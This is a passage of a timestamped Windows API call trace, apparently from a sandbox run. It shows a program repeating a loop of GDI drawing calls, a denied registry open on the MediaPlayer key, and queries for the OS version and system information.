lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.405] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.405] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.405] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.405] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.405] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa30401d6 [0088.405] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa50401d3 [0088.405] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041af4 [0088.405] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041af5 [0088.405] CombineRgn (hrgnDst=0x1041af4, hrgnSrc1=0xa30401d6, hrgnSrc2=0xa50401d3, iMode=1) returned 1 [0088.405] CombineRgn (hrgnDst=0x1041af5, hrgnSrc1=0xa30401d6, hrgnSrc2=0xa50401d3, iMode=4) returned 2 [0088.405] CreateSolidBrush (color=0xff) returned 0x2101af3 [0088.405] CreateSolidBrush (color=0xff0000) returned 0x1101af6 [0088.405] DeleteObject (ho=0x1101af6) returned 1 [0088.405] DeleteObject (ho=0xa50401d3) returned 1 [0088.405] DeleteObject (ho=0xa30401d6) returned 1 [0088.405] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.405] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.405] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.405] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.405] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.405] BeginPath (hdc=0x0) returned 0 [0088.405] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.405] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.406] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.406] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.406] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.406] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.406] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.406] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.406] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa60401d3 [0088.406] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa40401d6 [0088.406] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041af7 [0088.406] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041af8 [0088.406] CombineRgn (hrgnDst=0x1041af7, hrgnSrc1=0xa60401d3, hrgnSrc2=0xa40401d6, iMode=1) returned 1 [0088.406] CombineRgn (hrgnDst=0x1041af8, hrgnSrc1=0xa60401d3, hrgnSrc2=0xa40401d6, iMode=4) returned 2 [0088.406] CreateSolidBrush (color=0xff) returned 0x2101af6 [0088.406] CreateSolidBrush (color=0xff0000) returned 0x1101af9 [0088.406] DeleteObject (ho=0x1101af9) returned 1 [0088.406] DeleteObject (ho=0xa40401d6) returned 1 [0088.406] DeleteObject (ho=0xa60401d3) returned 1 [0088.406] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.406] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.406] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.406] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.406] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.406] BeginPath (hdc=0x0) returned 0 [0088.406] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.406] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.406] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.406] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.406] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.406] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.407] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.407] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.407] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa50401d6 [0088.407] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa70401d3 [0088.407] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041afa [0088.407] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041afb [0088.407] CombineRgn (hrgnDst=0x1041afa, hrgnSrc1=0xa50401d6, hrgnSrc2=0xa70401d3, iMode=1) returned 1 [0088.407] CombineRgn (hrgnDst=0x1041afb, hrgnSrc1=0xa50401d6, hrgnSrc2=0xa70401d3, iMode=4) returned 2 [0088.407] CreateSolidBrush (color=0xff) returned 0x2101af9 [0088.407] CreateSolidBrush (color=0xff0000) returned 0x1101afc [0088.407] DeleteObject (ho=0x1101afc) returned 1 [0088.407] DeleteObject (ho=0xa70401d3) returned 1 [0088.407] DeleteObject (ho=0xa50401d6) returned 1 [0088.407] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.407] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.407] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.407] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.407] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.407] BeginPath (hdc=0x0) returned 0 [0088.407] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.407] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.407] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.407] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.407] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.407] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.407] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.407] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.407] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa80401d3 [0088.408] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa60401d6 [0088.408] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041afd [0088.408] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041afe [0088.408] CombineRgn (hrgnDst=0x1041afd, hrgnSrc1=0xa80401d3, hrgnSrc2=0xa60401d6, iMode=1) returned 1 [0088.408] CombineRgn (hrgnDst=0x1041afe, hrgnSrc1=0xa80401d3, hrgnSrc2=0xa60401d6, iMode=4) returned 2 [0088.408] CreateSolidBrush (color=0xff) returned 0x2101afc [0088.408] CreateSolidBrush (color=0xff0000) returned 0x1101aff [0088.408] DeleteObject (ho=0x1101aff) returned 1 [0088.408] DeleteObject (ho=0xa60401d6) returned 1 [0088.408] DeleteObject (ho=0xa80401d3) returned 1 [0088.408] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.408] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.408] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.408] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.408] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.408] BeginPath (hdc=0x0) returned 0 [0088.408] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.408] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.408] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.408] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.408] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.408] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.408] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.408] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.408] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa70401d6 [0088.408] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa90401d3 [0088.408] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041b00 [0088.408] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041b01 [0088.408] CombineRgn (hrgnDst=0x1041b00, hrgnSrc1=0xa70401d6, hrgnSrc2=0xa90401d3, iMode=1) returned 1 [0088.408] CombineRgn (hrgnDst=0x1041b01, hrgnSrc1=0xa70401d6, hrgnSrc2=0xa90401d3, iMode=4) returned 2 [0088.408] CreateSolidBrush (color=0xff) returned 0x2101aff [0088.408] CreateSolidBrush (color=0xff0000) returned 0x1101b02 [0088.409] DeleteObject (ho=0x1101b02) returned 1 [0088.409] DeleteObject (ho=0xa90401d3) returned 1 [0088.409] DeleteObject (ho=0xa70401d6) returned 1 [0088.409] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.409] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.409] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.409] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.409] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.409] BeginPath (hdc=0x0) returned 0 [0088.409] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.409] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.409] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.409] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.409] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.409] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.409] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.409] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.409] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xaa0401d3 [0088.409] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa80401d6 [0088.409] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041b03 [0088.409] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041b04 [0088.409] CombineRgn (hrgnDst=0x1041b03, hrgnSrc1=0xaa0401d3, hrgnSrc2=0xa80401d6, iMode=1) returned 1 [0088.409] CombineRgn (hrgnDst=0x1041b04, hrgnSrc1=0xaa0401d3, hrgnSrc2=0xa80401d6, iMode=4) returned 2 [0088.409] CreateSolidBrush (color=0xff) returned 0x2101b02 [0088.409] CreateSolidBrush (color=0xff0000) returned 0x1101b05 [0088.409] DeleteObject (ho=0x1101b05) returned 1 [0088.409] DeleteObject (ho=0xa80401d6) returned 1 [0088.409] DeleteObject (ho=0xaa0401d3) returned 1 [0088.409] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.409] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.409] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.409] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.410] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.410] BeginPath (hdc=0x0) returned 0 [0088.410] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.410] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.410] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.410] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.410] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.410] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.410] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.410] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.410] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa90401d6 [0088.410] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xab0401d3 [0088.410] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041b06 [0088.410] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041b07 [0088.410] CombineRgn (hrgnDst=0x1041b06, hrgnSrc1=0xa90401d6, hrgnSrc2=0xab0401d3, iMode=1) returned 1 [0088.410] CombineRgn (hrgnDst=0x1041b07, hrgnSrc1=0xa90401d6, hrgnSrc2=0xab0401d3, iMode=4) returned 2 [0088.410] CreateSolidBrush (color=0xff) returned 0x2101b05 [0088.410] CreateSolidBrush (color=0xff0000) returned 0x1101b08 [0088.410] DeleteObject (ho=0x1101b08) returned 1 [0088.410] DeleteObject (ho=0xab0401d3) returned 1 [0088.410] DeleteObject (ho=0xa90401d6) returned 1 [0088.410] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.410] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.410] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.410] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.410] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.410] BeginPath (hdc=0x0) returned 0 [0088.410] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.410] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.410] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.410] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.410] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.411] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.411] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.411] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.411] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xac0401d3 [0088.411] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xaa0401d6 [0088.411] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041b09 [0088.411] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041b0a [0088.411] CombineRgn (hrgnDst=0x1041b09, hrgnSrc1=0xac0401d3, hrgnSrc2=0xaa0401d6, iMode=1) returned 1 [0088.411] CombineRgn (hrgnDst=0x1041b0a, hrgnSrc1=0xac0401d3, hrgnSrc2=0xaa0401d6, iMode=4) returned 2 [0088.411] CreateSolidBrush (color=0xff) returned 0x2101b08 [0088.411] CreateSolidBrush (color=0xff0000) returned 0x1101b0b [0088.411] DeleteObject (ho=0x1101b0b) returned 1 [0088.411] DeleteObject (ho=0xaa0401d6) returned 1 [0088.411] DeleteObject (ho=0xac0401d3) returned 1 [0088.411] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.411] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.411] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.411] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.411] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.411] BeginPath (hdc=0x0) returned 0 [0088.411] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.411] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.411] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.411] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.411] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.411] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.411] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.411] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.412] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xab0401d6 [0088.412] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xad0401d3 [0088.412] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041b0c [0088.412] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041b0d [0088.412] CombineRgn (hrgnDst=0x1041b0c, hrgnSrc1=0xab0401d6, hrgnSrc2=0xad0401d3, iMode=1) returned 1 [0088.412] CombineRgn (hrgnDst=0x1041b0d, hrgnSrc1=0xab0401d6, hrgnSrc2=0xad0401d3, iMode=4) returned 2 [0088.412] CreateSolidBrush (color=0xff) returned 0x2101b0b [0088.412] CreateSolidBrush (color=0xff0000) returned 0x1101b0e [0088.412] DeleteObject (ho=0x1101b0e) returned 1 [0088.412] DeleteObject (ho=0xad0401d3) returned 1 [0088.412] DeleteObject (ho=0xab0401d6) returned 1 [0088.412] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.412] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.412] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.412] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.412] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.412] BeginPath (hdc=0x0) returned 0 [0088.412] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.412] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.412] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.412] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.412] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.412] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.412] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.412] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.412] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xae0401d3 [0088.413] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xac0401d6 [0088.413] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041b0f [0088.413] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041b10 [0088.413] CombineRgn (hrgnDst=0x1041b0f, 